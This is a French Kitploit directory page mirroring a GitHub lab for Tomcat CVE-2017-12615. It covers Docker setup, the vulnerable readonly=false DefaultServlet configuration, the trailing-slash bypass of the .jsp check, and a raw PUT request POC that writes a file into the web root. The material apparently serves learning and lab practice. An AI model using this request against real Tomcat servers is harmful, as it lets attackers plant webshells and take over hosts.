Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Tomcat-CVE-2017-12615 | Kitploit
Outils/GitHubGitHub/cyberharsh/tomcat-cve-2017-12615
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubcyberharsh/tomcat-cve-2017-12615

Tomcat-CVE-2017-12615

Voir le dépôt
il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Tomcat Arbitrary Write-file Vulnerability through PUT Method (CVE-2017-12615)

中文版本(version chinoise)

Tomcat version : 8.5.19

Mise en place de l'environnement

root@kitploit:~
docker-compose build
docker-compose up -d

Après avoir exécuté les commandes ci-dessus avec succès, vous verrez la page d'exemple de Tomcat en visitant le site http://your-ip:8080.

Principe

Liens de référence :

  • http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
  • https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
  • https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e

Tomcat configure la permission d'écriture (readonly=false), ce qui permet d'écrire des fichiers sur le serveur.

root@kitploit:~
<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>listings</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>

Bien que Tomcat vérifie l'extension du fichier dans une certaine mesure (il ne peut pas écrire directement de fichier jsp), nous pouvons toujours contourner cette limitation grâce à certaines fonctionnalités du système de fichiers (comme l'utilisation de / sous Linux).

POC

Envoyez directement les requêtes suivantes, puis le shell sera écrit dans le répertoire racine Web.

root@kitploit:~
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell

Comme suit :

Télécharger l’outil